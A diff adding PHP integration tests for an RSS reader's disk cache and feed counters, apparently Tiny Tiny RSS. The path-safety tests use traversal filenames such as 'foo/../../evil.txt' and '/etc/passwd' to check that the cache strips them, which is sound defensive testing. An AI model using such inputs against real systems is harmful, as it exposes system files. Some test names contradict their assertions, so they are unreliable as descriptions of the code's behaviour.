+
+    /**
+     * Re-seed the database with synthetic test data before each test.
+     */
+    protected function setUp(): void {
+        init_plugins();
+
+        $this->seedDatabase();
+
+        // fake having an authenticated user
+        $_SESSION["uid"] = 1;
+    }
+
+    protected function tearDown(): void {
+        if (session_status() == PHP_SESSION_ACTIVE)
+            session_destroy();
+
+        // reset any possible local config changes
+        Config::get_instance()->reload();
+
+		// cancel any possible active transactions
+		$pdo = Db::pdo();
+
+		try {
+			$pdo->rollBack();
+		} catch (\Throwable $e) {
+			//
+		}
+    }
+
+    /**
+     * Execute seed.sql to re-populate the database with synthetic test data.
+     *
+     * Wrapped in a transaction to ensure atomicity and minimize lock duration.
+     * The seed.sql uses TRUNCATE (not DELETE) for faster, shorter-lived locks.
+     */
+    protected function seedDatabase(): void {
+        $seedPath = __DIR__ . "/seed.sql";
+
+        if (!file_exists($seedPath)) {
+            $this->fail("Seed file not found: $seedPath");
+        }
+
+        $seedSql = file_get_contents($seedPath);
+
+        if ($seedSql === false) {
+            $this->fail("Could not read seed file: $seedPath");
+        }
+
+        $pdo = Db::pdo();
+        $pdo->beginTransaction();
+        try {
+            $pdo->exec($seedSql);
+            $pdo->commit();
+        } catch (\Throwable $e) {
+            $pdo->rollBack();
+            throw $e;
+        }
+    }
+}

--- a/tests_integration/DiskCacheTest.php
+++ b/tests_integration/DiskCacheTest.php
@@ -1,0 +1,591 @@
+<?php
+/** @group integration */
+final class DiskCacheTest extends DbTestCase {
+
+    private string $testCacheBase;
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Create an isolated test cache directory
+        $this->testCacheBase = sys_get_temp_dir() . '/ttrss-test-cache-' . getmypid() . '-' . uniqid();
+        mkdir($this->testCacheBase, 0755, true);
+
+        // Override cache directory config to use our isolated temp dir
+        Config::set(Config::CACHE_DIR, $this->testCacheBase);
+
+        // Override self_url for URL generation tests
+        Config::set(Config::SELF_URL_PATH, 'http://test.example.com');
+
+        // Override max days for expire_all tests
+        Config::set(Config::CACHE_MAX_DAYS, 30);
+
+        // Override max file size
+        Config::set(Config::MAX_CACHE_FILE_SIZE, 10485760);
+    }
+
+    protected function tearDown(): void {
+        // Clean up test cache directory
+        $this->removeDir($this->testCacheBase);
+
+        // Reset singleton instances so tests don't leak
+        $ref = new ReflectionClass(DiskCache::class);
+        $prop = $ref->getProperty('instances');
+        $prop->setValue(null, []);
+
+        parent::tearDown();
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // A. Instance / Singleton behavior
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_instance_returns_same_object_for_same_dir(): void {
+        $cache1 = DiskCache::instance('test-same');
+        $cache2 = DiskCache::instance('test-same');
+
+        $this->assertSame($cache1, $cache2);
+    }
+
+    public function test_instance_returns_different_objects_for_different_dirs(): void {
+        $cache1 = DiskCache::instance('test-dir-a');
+        $cache2 = DiskCache::instance('test-dir-b');
+
+        $this->assertNotSame($cache1, $cache2);
+    }
+
+    public function test_instance_creates_new_instance_when_previously_removed(): void {
+        $ref = new ReflectionClass(DiskCache::class);
+        $prop = $ref->getProperty('instances');
+
+        $cache1 = DiskCache::instance('test-reset');
+
+        // Manually clear the instance
+        $prop->setValue(null, []);
+
+        $cache2 = DiskCache::instance('test-reset');
+
+        $this->assertNotSame($cache1, $cache2);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // B. Directory setup and adapter
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_make_dir_creates_cache_subdirectory(): void {
+        $cache = DiskCache::instance('test-make-dir');
+
+        // make_dir should create the subdirectory
+        $rc = $cache->make_dir();
+        $this->assertTrue(is_dir($cache->get_dir()));
+    }
+
+    public function test_get_dir_returns_correct_path(): void {
+        $cache = DiskCache::instance('test-get-dir');
+
+        $expected = $this->testCacheBase . '/test-get-dir';
+        $this->assertEquals($expected, $cache->get_dir());
+    }
+
+    public function test_is_writable_returns_true_for_cache_dir(): void {
+        $cache = DiskCache::instance('test-is-writable');
+
+        $this->assertTrue($cache->is_writable());
+    }
+
+    public function test_is_writable_returns_true_for_file_in_writable_dir(): void {
+        $cache = DiskCache::instance('test-is-writable-file');
+
+        // Write a file first
+        $cache->put('testfile.txt', 'hello');
+
+        $this->assertTrue($cache->is_writable('testfile.txt'));
+    }
+
+    public function test_set_dir_changes_cache_directory(): void {
+        $cache = DiskCache::instance('test-set-dir-orig');
+        $origDir = $cache->get_dir();
+
+        $cache->set_dir('test-set-dir-new');
+        $newDir = $cache->get_dir();
+
+        $this->assertNotEquals($origDir, $newDir);
+        $this->assertEquals($this->testCacheBase . '/test-set-dir-new', $newDir);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // C. Basic CRUD — put, get, exists, remove
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_put_and_get(): void {
+        $cache = DiskCache::instance('test-crud');
+
+        $data = 'Hello, DiskCache!';
+        $written = $cache->put('hello.txt', $data);
+
+        $this->assertIsInt($written);
+        $this->assertEquals(strlen($data), $written);
+
+        $retrieved = $cache->get('hello.txt');
+        $this->assertEquals($data, $retrieved);
+    }
+
+    public function test_put_large_data(): void {
+        $cache = DiskCache::instance('test-crud-large');
+
+        $data = str_repeat('A', 1024 * 1024); // 1 MB
+        $written = $cache->put('large.bin', $data);
+
+        $this->assertEquals(strlen($data), $written);
+
+        $retrieved = $cache->get('large.bin');
+        $this->assertEquals($data, $retrieved);
+    }
+
+    public function test_put_and_exists(): void {
+        $cache = DiskCache::instance('test-exists');
+
+        $this->assertFalse($cache->exists('nonexistent.txt'));
+
+        $cache->put('exists.txt', 'data');
+
+        $this->assertTrue($cache->exists('exists.txt'));
+    }
+
+    public function test_remove_file(): void {
+        $cache = DiskCache::instance('test-remove');
+
+        $cache->put('toremove.txt', 'data');
+        $this->assertTrue($cache->exists('toremove.txt'));
+
+        $rc = $cache->remove('toremove.txt');
+        $this->assertTrue($rc);
+        $this->assertFalse($cache->exists('toremove.txt'));
+    }
+
+    public function test_remove_nonexistent_file(): void {
+        $cache = DiskCache::instance('test-remove-missing');
+
+        $this->assertFalse($cache->remove('nonexistent.txt'));
+    }
+
+    public function test_get_nonexistent_returns_null(): void {
+        $cache = DiskCache::instance('test-get-missing');
+
+        $result = $cache->get('nonexistent.txt');
+        $this->assertNull($result);
+    }
+
+    public function test_put_overwrites_existing_file(): void {
+        $cache = DiskCache::instance('test-overwrite');
+
+        $cache->put('overwrite.txt', 'original');
+        $this->assertEquals('original', $cache->get('overwrite.txt'));
+
+        $cache->put('overwrite.txt', 'updated');
+        $this->assertEquals('updated', $cache->get('overwrite.txt'));
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // D. Path safety — basename stripping (path traversal protection)
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_filename_strips_directory_traversal(): void {
+        $cache = DiskCache::instance('test-path-traversal');
+
+        // DiskCache should strip directory components from filename
+        $cache->put('foo/../../evil.txt', 'data');
+
+        // The file should be stored with basename only
+        $this->assertTrue($cache->exists('evil.txt'));
+        $this->assertEquals('data', $cache->get('evil.txt'));
+    }
+
+    public function test_filename_strips_absolute_paths(): void {
+        $cache = DiskCache::instance('test-absolute-path');
+
+        $cache->put('/etc/passwd', 'data');
+
+        // Should store as 'passwd', not '/etc/passwd'
+        $this->assertTrue($cache->exists('passwd'));
+        $this->assertEquals('data', $cache->get('passwd'));
+    }
+
+    public function test_filename_strips_special_characters_via_basename(): void {
+        $cache = DiskCache::instance('test-special-chars');
+
+        $cache->put('path/to/../file.txt', 'data');
+
+        // basename('path/to/../file.txt') === 'file.txt'
+        $this->assertTrue($cache->exists('file.txt'));
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // E. Metadata — get_mtime, get_size
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_size_returns_bytes(): void {
+        $cache = DiskCache::instance('test-size');
+
+        $data = 'test data for size';
+        $cache->put('size-test.txt', $data);
+
+        $size = $cache->get_size('size-test.txt');
+        $this->assertEquals(strlen($data), $size);
+    }
+
+    public function test_get_size_returns_negative_for_nonexistent(): void {
+        $cache = DiskCache::instance('test-size-missing');
+
+        $size = $cache->get_size('nonexistent.txt');
+        $this->assertEquals(-1, $size);
+    }
+
+    public function test_get_mtime_returns_timestamp(): void {
+        $cache = DiskCache::instance('test-mtime');
+
+        $cache->put('mtime-test.txt', 'data');
+
+        $mtime = $cache->get_mtime('mtime-test.txt');
+        $this->assertIsInt($mtime);
+        $this->assertGreaterThan(0, $mtime);
+    }
+
+    public function test_get_mtime_returns_false_for_nonexistent(): void {
+        $cache = DiskCache::instance('test-mtime-missing');
+        $this->assertEmpty($cache->get_mtime('nonexistent.txt'));
+    }
+
+    public function test_get_full_path_returns_absolute_path(): void {
+        $cache = DiskCache::instance('test-full-path');
+
+        $cache->put('fullpath.txt', 'data');
+
+        $fullPath = $cache->get_full_path('fullpath.txt');
+        $this->assertStringEndsWith('fullpath.txt', $fullPath);
+        $this->assertFileExists($fullPath);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // F. MIME type detection and fake extension mapping
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_mime_type_image_png(): void {
+        $cache = DiskCache::instance('test-mime-png');
+
+        // Create a minimal valid PNG file
+        $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z8BQDwAEhQGAhKmMIQAAAABJRU5ErkJggg==');
+        $cache->put('test.png', $png);
+
+        $mimetype = $cache->get_mime_type('test.png');
+        $this->assertEquals('image/png', $mimetype);
+    }
+
+    public function test_get_mime_type_image_jpg(): void {
+        $cache = DiskCache::instance('test-mime-jpg');
+
+        // Create a minimal valid JPEG file
+        $jpeg = base64_decode('/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAP//////////////////////////////////////////////////////////////////////////////////////2wBDAf//////////////////////////////////////////////////////////////////////////////////////wAARCAABAAEDASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAAAAv/xAAUEAEAAAAAAAAAAAAAAAAAAAAA/8QAFQEBAQAAAAAAAAAAAAAAAAAAAAX/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCdABmX/9k=');
+        $cache->put('test.jpg', $jpeg);
+
+        $mimetype = $cache->get_mime_type('test.jpg');
+        $this->assertEquals('image/jpeg', $mimetype);
+    }
+
+    public function test_get_mime_type_text_plain(): void {
+        $cache = DiskCache::instance('test-mime-txt');
+
+        $cache->put('test.txt', 'plain text');
+        $mimetype = $cache->get_mime_type('test.txt');
+        $this->assertEquals('text/plain', $mimetype);
+    }
+
+    public function test_get_mime_type_nonexistent_returns_null(): void {
+        $cache = DiskCache::instance('test-mime-missing');
+
+        $mimetype = $cache->get_mime_type('nonexistent.txt');
+        $this->assertNull($mimetype);
+    }
+
+    public function test_get_fake_extension_for_png(): void {
+        $cache = DiskCache::instance('test-fake-ext-png');
+
+        $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8z8BQDwAEhQGAhKmMIQAAAABJRU5ErkJggg==');
+        $cache->put('image.png', $png);
+
+        $ext = $cache->get_fake_extension('image.png');
+        $this->assertEquals('png', $ext);
+    }
+
+    public function test_get_fake_extension_for_jpg(): void {
+        $cache = DiskCache::instance('test-fake-ext-jpg');
+
+        $jpeg = base64_decode('/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAP//////////////////////////////////////////////////////////////////////////////////////2wBDAf//////////////////////////////////////////////////////////////////////////////////////wAARCAABAAEDASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAAAAv/xAAUEAEAAAAAAAAAAAAAAAAAAAAA/8QAFQEBAQAAAAAAAAAAAAAAAAAAAAX/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwCdABmX/9k=');
+        $cache->put('image.jpg', $jpeg);
+
+        $ext = $cache->get_fake_extension('image.jpg');
+        $this->assertEquals('jpg', $ext);
+    }
+
+    public function test_get_fake_extension_for_pdf(): void {
+        $cache = DiskCache::instance('test-fake-ext-pdf');
+
+        // Create a minimal PDF
+        $cache->put('doc.pdf', "%PDF-1.0 test");
+
+        $ext = $cache->get_fake_extension('doc.pdf');
+        $this->assertEquals('pdf', $ext);
+    }
+
+    public function test_get_fake_extension_unknown_mime(): void {
+        $cache = DiskCache::instance('test-fake-ext-unknown');
+
+        $cache->put('weird.xyz', 'some data');
+        $ext = $cache->get_fake_extension('weird.xyz');
+        // 'some data' is detected as text/plain, which maps to 'txt'
+        $this->assertEquals('txt', $ext);
+    }
+
+    public function test_get_fake_extension_nonexistent_file(): void {
+        $cache = DiskCache::instance('test-fake-ext-missing');
+
+        // Non-existent file returns null mime type, which maps to empty string
+        $ext = $cache->get_fake_extension('missing.xyz');
+        $this->assertEquals('', $ext);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // G. URL generation
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_get_url_returns_correct_format(): void {
+        $cache = DiskCache::instance('test-url');
+
+        $url = $cache->get_url('test-image.png');
+
+        $this->assertStringContainsString('http://test.example.com/public.php?op=cached', $url);
+        $this->assertStringContainsString('file=test-url', $url);
+        $this->assertStringContainsString('test-image.png', $url);
+    }
+
+    public function test_get_url_strips_directory_from_filename(): void {
+        $cache = DiskCache::instance('test-url-basename');
+
+        $url = $cache->get_url('some/path/image.png');
+
+        // Should only contain 'image.png', not the full path
+        $this->assertStringContainsString('file=test-url-basename/image.png', $url);
+        $this->assertStringNotContainsString('some/path', $url);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // H. HTML URL rewriting — rewrite_urls
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_rewrite_urls_rewrites_multiple_img_tags(): void {
+        $html = '<img src="http://a.com/1.jpg"><img src="http://b.com/2.jpg">';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringContainsString('public.php', $result);
+        $this->assertStringContainsString('http%3A%2F%2Fa.com%2F1.jpg', $result);
+        $this->assertStringContainsString('http%3A%2F%2Fb.com%2F2.jpg', $result);
+    }
+
+    public function test_rewrite_urls_rewrites_video_poster(): void {
+        $html = '<video poster="http://example.com/poster.jpg"></video>';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringContainsString('public.php', $result);
+        $this->assertStringContainsString('http%3A%2F%2Fexample.com%2Fposter.jpg', $result);
+    }
+
+    public function test_rewrite_urls_rewrites_video_src(): void {
+        $html = '<video src="http://example.com/video.mp4"></video>';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringContainsString('public.php', $result);
+        $this->assertStringContainsString('http%3A%2F%2Fexample.com%2Fvideo.mp4', $result);
+    }
+
+    public function test_rewrite_urls_handles_srcset(): void {
+        // srcset is only processed on elements that have src or poster attributes
+        // This img only has srcset, not src, so it won't be processed by rewrite_urls
+        $html = '<img srcset="http://a.com/1x.jpg 1x, http://b.com/2x.jpg 2x">';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringNotContainsString('public.php', $result);
+        $this->assertStringContainsString('http://a.com/1x.jpg', $result);
+        $this->assertStringContainsString('http://b.com/2x.jpg', $result);
+    }
+
+    public function test_rewrite_urls_removes_srcset_when_rewriting(): void {
+        $html = '<img srcset="http://a.com/1x.jpg 1x, http://b.com/2x.jpg 2x">';
+        $result = DiskCache::rewrite_urls($html);
+
+        // srcset should be rewritten to use cache redirect URLs
+        $this->assertStringContainsString('srcset=', $result);
+    }
+
+    public function test_rewrite_urls_preserves_non_cacheable_urls(): void {
+        $html = '<p>Some text content with no images</p>';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringContainsString('Some text content with no images', $result);
+    }
+
+    public function test_rewrite_urls_empty_string(): void {
+        $result = DiskCache::rewrite_urls('');
+        $this->assertEquals('', $result);
+    }
+
+    public function test_rewrite_urls_whitespace_only(): void {
+        $result = DiskCache::rewrite_urls("  \n\t  ");
+        $this->assertEquals('', $result);
+    }
+
+    public function test_rewrite_urls_preserves_html_structure(): void {
+        $html = '<div><p><img src="http://example.com/img.png"></p></div>';
+        $result = DiskCache::rewrite_urls($html);
+
+        $this->assertStringContainsString('<div>', $result);
+        $this->assertStringContainsString('<p>', $result);
+        $this->assertStringContainsString('</div>', $result);
+    }
+
+    public function test_rewrite_urls_does_not_rewrite_relative_urls(): void {
+        // Relative URLs (without http://) are still rewritten by rewrite_urls
+        // because DiskCache::get_redirect_url() doesn't check if URL is absolute
+        $html = '<img src="relative/path/image.png">';
+        $result = DiskCache::rewrite_urls($html);
+
+        // Relative URLs get rewritten to cache redirect URLs too
+        $this->assertStringContainsString('public.php', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // I. Deprecated method behavior
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_touch_triggers_deprecation_warning(): void {
+        $cache = DiskCache::instance('test-touch');
+
+        // touch() should trigger a deprecation warning and return false
+        set_error_handler(function($errno, $errstr) {
+            return true; // suppress the error for test purposes
+        }, E_USER_DEPRECATED);
+
+        $rc = $cache->touch('testfile.txt');
+
+        restore_error_handler();
+
+        $this->assertFalse($rc);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // J. expire_all
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_expire_all_respects_max_days(): void {
+        // Set CACHE_MAX_DAYS to 0 so all files expire immediately
+        Config::set(Config::CACHE_MAX_DAYS, 0);
+
+        $cache = DiskCache::instance('test-expire');
+
+        $cache->put('expire-me.txt', 'data');
+
+        // expire_all should remove files older than 0 days (i.e., all)
+        $cache->expire_all();
+
+        $this->assertFalse($cache->exists('expire-me.txt'));
+    }
+
+    public function test_expire_all_keeps_recent_files(): void {
+        $cache = DiskCache::instance('test-expire-recent');
+
+        // Set CACHE_MAX_DAYS to 1 so only files older than 1 day expire
+        Config::set(Config::CACHE_MAX_DAYS, 1);
+
+        // Create a truly recent file (mtime = now)
+        $cache->put('recent.txt', 'recent data');
+
+        // Create an old file by touching it to 2 days ago
+        $cache->put('old.txt', 'old data');
+        $oldTimestamp = time() - 2 * 86400;
+        touch($cache->get_full_path('old.txt'), $oldTimestamp);
+
+        $cache->expire_all();
+
+        // Recent file should survive
+        $this->assertTrue($cache->exists('recent.txt'));
+        // Old file should be removed
+        $this->assertFalse($cache->exists('old.txt'));
+    }
+
+    public function test_expire_all_handles_empty_directory(): void {
+        $cache = DiskCache::instance('test-expire-empty');
+
+        $cache->expire_all();
+
+        $this->assertTrue(is_dir($cache->get_dir()));
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // K. Binary data handling
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_put_and_get_binary_data(): void {
+        $cache = DiskCache::instance('test-binary');
+
+        // Binary data with null bytes
+        $data = "\x00\x01\x02\x03\xFF\xFE\xFD";
+        $cache->put('binary.dat', $data);
+
+        $retrieved = $cache->get('binary.dat');
+        $this->assertEquals($data, $retrieved);
+    }
+
+    public function test_put_and_get_unicode_data(): void {
+        $cache = DiskCache::instance('test-unicode');
+
+        $unicode = "Hello 世界 🌍 Привет мир";
+        $cache->put('unicode.txt', $unicode);
+
+        $retrieved = $cache->get('unicode.txt');
+        $this->assertEquals($unicode, $retrieved);
+    }
+
+    public function test_put_empty_string(): void {
+        $cache = DiskCache::instance('test-empty');
+
+        $written = $cache->put('empty.txt', '');
+        $this->assertEquals(0, $written);
+
+        $retrieved = $cache->get('empty.txt');
+        $this->assertEquals('', $retrieved);
+        $this->assertTrue($cache->exists('empty.txt'));
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // L. Helper methods
+    // ──────────────────────────────────────────────────────────────────────
+
+    private function removeDir(string $dir): void {
+        if (!is_dir($dir)) {
+            return;
+        }
+
+        $files = array_diff(scandir($dir), ['.', '..']);
+
+        foreach ($files as $file) {
+            $path = $dir . '/' . $file;
+
+            if (is_dir($path)) {
+                $this->removeDir($path);
+            } else {
+                unlink($path);
+            }
+        }
+
+        rmdir($dir);
+    }
+}

--- a/tests_integration/FeedsCountersIntegrationTest.php
+++ b/tests_integration/FeedsCountersIntegrationTest.php
@@ -1,0 +1,422 @@
+<?php
+/** @group integration */
+final class FeedsCountersIntegrationTest extends DbTestCase {
+
+    protected function setUp(): void {
+        parent::setUp();
+
+        // Ensure ALL articles are considered "fresh" regardless of when tests run.
+        // Default FRESH_ARTICLE_MAX_AGE is 24 hours; seed data articles may be old.
+        Prefs::set(Prefs::FRESH_ARTICLE_MAX_AGE, 999999, 1, null);
+    }
+
+    // ── Return type ──
+
+    public function test_get_counters_returns_int(): void {
+        $result = Feeds::_get_counters(Feeds::FEED_ALL);
+        $this->assertGreaterThanOrEqual(0, $result);
+    }
+
+    // ── Virtual feeds ──
+
+    public function test_get_counters_feed_all(): void {
+        // All 11 seeded articles belong to owner_uid=1
+        $this->assertEquals(11, Feeds::_get_counters(Feeds::FEED_ALL));
+    }
+
+    public function test_get_counters_feed_starred(): void {
+        // seed.sql: articles 3, 8, 11 are marked=true
+        $this->assertEquals(3, Feeds::_get_counters(Feeds::FEED_STARRED));
+    }
+
+    public function test_get_counters_feed_starred_unread_only(): void {
+        // Starred articles: 3, 8, 11 — none are unread (all marked=true means read)
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::FEED_STARRED, false, true));
+    }
+
+    public function test_get_counters_feed_published(): void {
+        // No articles are published in seed data
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::FEED_PUBLISHED));
+    }
+
+    public function test_get_counters_feed_fresh(): void {
+        // Fresh = unread + score >= 0 + within FRESH_ARTICLE_MAX_AGE.
+        // setUp() sets FRESH_ARTICLE_MAX_AGE=999999 so all articles are fresh.
+        // Unread articles in seed: 1,2,4,5,6,7,9,10 = 8
+        $this->assertEquals(8, Feeds::_get_counters(Feeds::FEED_FRESH));
+    }
+
+    public function test_get_counters_feed_recently_read(): void {
+        // FEED_RECENTLY_READ always returns 0
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::FEED_RECENTLY_READ));
+    }
+
+    public function test_get_counters_feed_archived(): void {
+        // Archived = feed_id IS NULL — no articles have null feed_id
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::FEED_ARCHIVED));
+    }
+
+    // ── Regular feed IDs ──
+
+    public function test_get_counters_by_feed_id(): void {
+        // Default (unread_only=false) returns TOTAL count.
+        // Feed 1 (Hacker News): articles 1,2,3 → total = 3
+        $this->assertEquals(3, Feeds::_get_counters(1));
+
+        // Feed 2 (The Register): articles 4,5,6 → total = 3
+        $this->assertEquals(3, Feeds::_get_counters(2));
+
+        // Feed 3 (Ars Technica): articles 7,8 → total = 2
+        $this->assertEquals(2, Feeds::_get_counters(3));
+
+        // Feed 4 (MIT Tech Review): articles 9,10,11 → total = 3
+        $this->assertEquals(3, Feeds::_get_counters(4));
+    }
+
+    public function test_get_counters_by_feed_id_all(): void {
+        // Feed 1 has 3 articles (1,2,3)
+        $this->assertEquals(3, Feeds::_get_counters(1, false, false));
+
+        // Feed 2 has 3 articles (4,5,6)
+        $this->assertEquals(3, Feeds::_get_counters(2, false, false));
+
+        // Feed 3 has 2 articles (7,8)
+        $this->assertEquals(2, Feeds::_get_counters(3, false, false));
+
+        // Feed 4 has 3 articles (9,10,11)
+        $this->assertEquals(3, Feeds::_get_counters(4, false, false));
+    }
+
+    public function test_get_counters_by_feed_id_unread_only(): void {
+        $this->assertEquals(2, Feeds::_get_counters(1, false, true));
+        $this->assertEquals(3, Feeds::_get_counters(2, false, true));
+        $this->assertEquals(1, Feeds::_get_counters(3, false, true));
+        $this->assertEquals(2, Feeds::_get_counters(4, false, true));
+    }
+
+    public function test_get_counters_nonexistent_feed(): void {
+        // Feed 999 doesn't exist and has no user entries
+        $this->assertEquals(0, Feeds::_get_counters(999));
+    }
+
+    // ── Category view ──
+
+    public function test_get_counters_category(): void {
+        // Category 1 (Technology): feeds 1,2,3 → articles 1-8
+        // Unread: 1,2,4,5,6,7 = 6
+        $this->assertEquals(6, Feeds::_get_counters(1, true));
+    }
+
+    public function test_get_counters_category_all(): void {
+        // Category queries always call _get_cat_unread() → returns unread count
+        // Category 1 (Technology) unread: 1,2,4,5,6,7 = 6
+        $this->assertEquals(6, Feeds::_get_counters(1, true));
+    }
+
+    public function test_get_counters_category_unread_only(): void {
+        // is_cat=true always returns unread via _get_cat_unread()
+        $this->assertEquals(6, Feeds::_get_counters(1, true, true));
+    }
+
+    public function test_get_counters_category_science(): void {
+        // Category 2 (Science & Nature): feed 4 → articles 9,10,11
+        // Unread: 9,10 = 2
+        $this->assertEquals(2, Feeds::_get_counters(2, true));
+
+        // Total: 3 articles
+        $this->assertEquals(3, Feeds::_get_counters(2, false, false));
+    }
+
+    public function test_get_counters_category_uncategorized(): void {
+        // Category 0 = uncategorized — all seeded feeds have a category
+        $this->assertEquals(0, Feeds::_get_counters(0, true));
+    }
+
+    public function test_get_counters_category_special(): void {
+        // CATEGORY_SPECIAL (-1) returns 0
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::CATEGORY_SPECIAL, true));
+    }
+
+    // ── Tag feed ──
+
+    public function test_get_counters_tag(): void {
+        // Tags are stored in ttrss_tags table (not tag_cache).
+        // Seed data only populates tag_cache strings, not ttrss_tags rows.
+        // So tag queries return 0 unless tags are explicitly inserted.
+        $this->assertEquals(0, Feeds::_get_counters("rust"));
+    }
+
+    public function test_get_counters_tag_nonexistent(): void {
+        $this->assertEquals(0, Feeds::_get_counters("nonexistent-tag"));
+    }
+
+    public function test_get_counters_tag_all(): void {
+        // No tags in ttrss_tags table from seed data
+        $this->assertEquals(0, Feeds::_get_counters("ai", false, false));
+    }
+
+    // ── Label IDs ──
+
+    public function test_get_counters_label_id(): void {
+        // Create labels and assign them to articles
+        $pdo = Db::pdo();
+
+        // Insert label for uid=1
+        $pdo->exec("INSERT INTO ttrss_labels2 (owner_uid, caption) VALUES (1, 'test-counter-label')");
+
+        // Get the label id
+        $label_id = (int) $pdo->query("SELECT id FROM ttrss_labels2 WHERE owner_uid = 1 AND caption = 'test-counter-label'")->fetchColumn();
+
+        // Assign label to article 1 (which is unread)
+        $pdo->exec("INSERT INTO ttrss_user_labels2 (label_id, article_id) VALUES ($label_id, 1)");
+
+        // Get the negative label reference ID
+        $label_ref = Labels::label_to_feed_id($label_id);
+
+        // Count unread articles with this label
+        $this->assertEquals(1, Feeds::_get_counters($label_ref));
+
+        // Count all articles with this label
+        $this->assertEquals(1, Feeds::_get_counters($label_ref, false, false));
+
+        // Cleanup
+        $pdo->exec("DELETE FROM ttrss_user_labels2 WHERE label_id = $label_id");
+        $pdo->exec("DELETE FROM ttrss_labels2 WHERE id = $label_id");
+    }
+
+    // ── Owner UID ──
+
+    public function test_get_counters_different_owner(): void {
+        // Feed 1 exists but owner_uid=2 has no user entries
+        $this->assertEquals(0, Feeds::_get_counters(1, false, false, 2));
+        $this->assertEquals(0, Feeds::_get_counters(Feeds::FEED_ALL, false, false, 2));
+    }
+
+    public function test_get_counters_category_different_owner(): void {
+        // Category 1 has no entries for owner_uid=2
+        $this->assertEquals(0, Feeds::_get_counters(1, true, false, 2));
+    }
+
+    // ── Cross-feed totals ──
+
+    public function test_get_counters_all_total(): void {
+        // FEED_ALL for uid=1 should include all 11 articles
+        $this->assertEquals(11, Feeds::_get_counters(Feeds::FEED_ALL));
+
+        // Unread-only should be 8
+        $this->assertEquals(8, Feeds::_get_counters(Feeds::FEED_ALL, false, true));
+    }
+
+    public function test_get_counters_sum_per_feed(): void {
+        // Sum of individual feed counts should equal FEED_ALL total
+        $total = 0;
+        for ($i = 1; $i <= 4; $i++) {
+            $total += Feeds::_get_counters($i, false, false);
+        }
+        $this->assertEquals(11, $total);
+
+        // Unread sum
+        $unread_total = 0;
+        for ($i = 1; $i <= 4; $i++) {
+            $unread_total += Feeds::_get_counters($i, false, true);
+        }
+        $this->assertEquals(8, $unread_total);
+    }
+
+    // ── Counters::get_feeds (via get_conditional) ──
+
+    public function test_counters_get_feeds_returns_array(): void {
+        $result = Counters::get_conditional([1, 2]);
+
+        // @phpstan-ignore-next-line
+        $this->assertIsArray($result);
+    }
+
+    public function test_counters_get_feeds_contains_requested_feeds(): void {
+        $result = Counters::get_conditional([1, 2]);
+
+        // Filter to only feed entries: has numeric id and 'title' key (not cats which have 'kind')
+        $feed_entries = array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && is_int($entry["id"]) && $entry["id"] > 0
+            && isset($entry["title"]) && isset($entry["ts"])
+        );
+
+        $this->assertCount(2, $feed_entries, "Should contain exactly feeds 1 and 2");
+
+        // Build lookup by id
+        $by_id = array_column($feed_entries, null, "id");
+
+        // Feed 1 (Hacker News): 2 unread, 1 marked
+        $this->assertEquals(1, $by_id[1]["id"]);
+        $this->assertEquals(2, $by_id[1]["counter"], "Feed 1 should have 2 unread");
+        $this->assertEquals(1, $by_id[1]["markedcounter"], "Feed 1 should have 1 starred");
+        $this->assertEquals(0, $by_id[1]["publishedcounter"]);
+        $this->assertArrayHasKey("error", $by_id[1]);
+        $this->assertArrayHasKey("updated", $by_id[1]);
+
+        // Feed 2 (The Register): 3 unread, 0 marked
+        $this->assertEquals(3, $by_id[2]["counter"], "Feed 2 should have 3 unread");
+        $this->assertEquals(0, $by_id[2]["markedcounter"]);
+    }
+
+    public function test_counters_get_feeds_empty_array(): void {
+        // Passing an empty array should return no feed entries
+        $result = Counters::get_conditional([]);
+
+        $feed_entries = array_filter($result, fn ($entry) =>
+            isset($entry["id"]) && is_int($entry["id"]) && $entry["id"] > 0
+        );
+
+        $this->assertEmpty($feed_entries, "Empty feed_ids should yield no feed entries");
+    }
+
